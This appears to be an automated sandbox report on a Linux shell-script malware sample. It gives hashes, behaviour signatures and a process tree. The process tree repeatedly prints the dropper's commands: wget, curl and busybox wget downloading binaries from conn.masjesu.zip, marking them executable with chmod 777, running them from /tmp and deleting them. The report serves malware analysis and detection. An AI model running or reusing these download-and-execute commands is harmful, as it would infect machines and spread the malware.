Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:44
Static task
static1
Behavioral task
behavioral1
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
-
Size
10KB
-
MD5
38c016b5fafe4cb231ee103b3d469c38
-
SHA1
11bf75788a74d2c7bf1a077fb4baedebb0fbf051
-
SHA256
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244
-
SHA512
bb6b857e72ce4063f5fb64cfe1b4950071040ba0b7ae6c3bbab6db49173f1bf43357fefdcd09c87d5c69920a5366e780036c41f4d1bf597042bb693386d5e86a
-
SSDEEP
192:C2i/8cZEED6O20nMNso9OuNSWso9Ou32i/8cLEED6Ol:C2i/8cZEED6O20nMNso9OuNSWso9Ou3Z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 26 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:700
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:705
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:725
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:728
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:730
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:731
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:737
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:738
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:763
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:770
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:772
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:786
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- System Network Configuration Discovery
PID:797
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:813
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:814
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:817
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:820
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:821
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:832
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:863
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:864
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:917
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:985
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97